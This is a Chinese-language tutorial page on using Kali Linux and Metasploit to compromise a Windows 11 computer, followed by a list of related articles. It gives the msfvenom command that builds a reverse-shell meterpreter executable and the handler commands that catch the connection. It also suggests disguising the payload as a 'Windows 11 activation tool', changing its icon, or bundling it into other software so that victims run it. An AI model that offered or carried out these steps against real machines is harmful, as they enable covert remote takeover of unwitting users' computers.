Kali Linux利用MSF渗透Windows11电脑

这篇具有很好参考价值的文章主要介绍了Kali Linux利用MSF渗透Windows11电脑。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、MSF简介

渗透环境

二、渗透流程

1.Kali Linux进入Root模式

 2.生成可执行文件

3.运行msfconsole命令

 4.配置参数

 5.在靶机Windows11打开可执行文件

6.渗透


一、MSF简介

Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。

渗透环境

使用Kali Linux进行演示操作

目标靶机:Windows11

软件:Msfvenom、Msfconsole(Kali Linux系统内置)

二、渗透流程

1.Kali Linux进入Root模式

不在Root模式下运行可能会出现操作者权限不够的提示,为了避免命令执行失败,第一步先将Kali进入Root管理员模式。执行命令之后输入Kali的密码时,密码是被隐藏的。

命令:sudo su

Kali Linux利用MSF渗透Windows11电脑

 2.生成可执行文件

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe

<本地ip>写自己Kali Linux的IP地址,用ifconfig就能查看自己Kali的IP地址
<本地端口号>自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Windows11激活工具等可能更容易让目标主机上钩
当然MSF也可以用来渗透Android、Mac、CentOS等

 Kali Linux利用MSF渗透Windows11电脑

这个就是Kali Linux主机的IP地址

 接下来运行命令来生成可执行文件Kali Linux利用MSF渗透Windows11电脑

 把生成的可执行文件放入目标靶机Windows11中

3.运行msfconsole命令

命令:msfconsole

Kali Linux利用MSF渗透Windows11电脑

 4.配置参数

(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.88.134(填写自己主机的IP地址)
(4)命令: set lport 1234(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
Kali Linux利用MSF渗透Windows11电脑

 5.在靶机Windows11打开可执行文件

Kali Linux利用MSF渗透Windows11电脑

在这里我们可以把文件稍微伪装一下,例如修改图标或者将其捆绑在某些软件中,当用户打开软件时会自动安装在其电脑上。

6.渗透

命令:sessions(查看上钩的目标靶机)

Kali Linux利用MSF渗透Windows11电脑

命令:sessions -i -1(选择要攻击的用户)

Kali Linux利用MSF渗透Windows11电脑

 

这个时候就已经拿到Windows11的shell啦^ ^文章来源地址https://www.toymoban.com/news/detail-461876.html

到了这里,关于Kali Linux利用MSF渗透Windows11电脑的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(44)
  • Kali Linux+Windows 11双系统物理实体机安装

    最开始我想的也是用虚拟机使用Kali,但是奈何配置不好实在得不到什么好的使用体验。后来是了解到grub是可以引导win系统的,又稍微看了一下谷歌,发现确实没什么关于Kali+Windows双系统安装的文章,于是就自己先给自己电脑装了双系统,然后出篇文章来稍微记录一下。 本文

    2024年02月09日
    浏览(40)
  • Kali Linux使用MSF木马入侵安卓手机

    声明: 本文章仅做娱乐和学习,切勿非法使用!! 本人技术一般,水平有限,如有不对请多多指正。 Kali Linux 安卓手机一部(安卓11) 要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的 CSDN博主「Lisa

    2024年01月24日
    浏览(42)
  • 【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

    目录 一、渗透攻击MySQL 1.1、第一步:信息收集 db_nmap扫描(内置、外置都可) Metasploit模块 sqlmap 1.2、第二步:获取服务器权限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源码中寻找数据库密码 向服务器写WebShell 1.3、第三步:提权 UDF提权(UDF提权) Mof提权 MySQL启动项提权 1

    2024年02月08日
    浏览(44)
  • 渗透测试 ---利用Kali进行简单的信息收集

    目录 Kali环境安装配置更新 Linux镜像文件下载地址 默认用户名 更新命令 网络环境配置 二层发现 原理 工具 arping netdiscover 三层发现 原理 工具 ping fping hping3 四层发现 原理 工具 nmap hping3 Python脚本 端口扫描 原理 工具 nmap Dmitry netcat 端口Banner信息获取 原理 工具 nmap dmitry netcat

    2024年02月05日
    浏览(55)
  • 利用MSF溢出漏洞提权windows server2012

    使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权。 在此之前已经上传一句话取得admin权限,在自己虚拟机做演示,大家通常取得的权限可能会比admin低,但也是可以进行以下提权的,这里要把目标提权至system权限。 kalil inux Windows S

    2024年01月24日
    浏览(48)
  • Kali渗透Windows服务器

    这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。 本次实战环境:Kali渗透Windows服务器 实战步骤一 本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测

    2024年02月07日
    浏览(34)
  • 网络安全--Kali渗透Windows

    这里我们学习使用Kali攻击机来渗透Windows,这里使用的是msfvenom木马来进行渗透。 命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe -o payload.exe 这里说明一下,-p 是指使用的工具模块,lhost是本机的IP地址,lport是本机的端口, -f 是指生成什么样的文件,简称指定

    2024年02月05日
    浏览(52)
  • 【Kali Linux高级渗透测试】深入剖析Kali Linux:高级渗透测试技术与实践

    📕作者简介: 热爱跑步的恒川 ,致力于C/C++、Java、Python等多编程语言,热爱跑步,喜爱音乐的一位博主。 📗本文收录于恒川的日常汇报系列,大家有兴趣的可以看一看 📘相关专栏C语言初阶、C语言进阶系列、恒川等,大家有兴趣的可以看一看 📙Python零基础入门系列,J

    2024年02月10日
    浏览(48)
  • 通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作

    环境说明 机器 ip地址 Kali主机 192.168.231.129 win7 靶机 192.168.231.143 1.使用kali虚拟机作为攻击机,利用nmap扫描获取目标的IP地址及漏洞,将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT,即在一个网段里面,然后进行扫描网段,查看存活主机,下面是两台机器的ip地址查

    2024年02月08日
    浏览(55)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包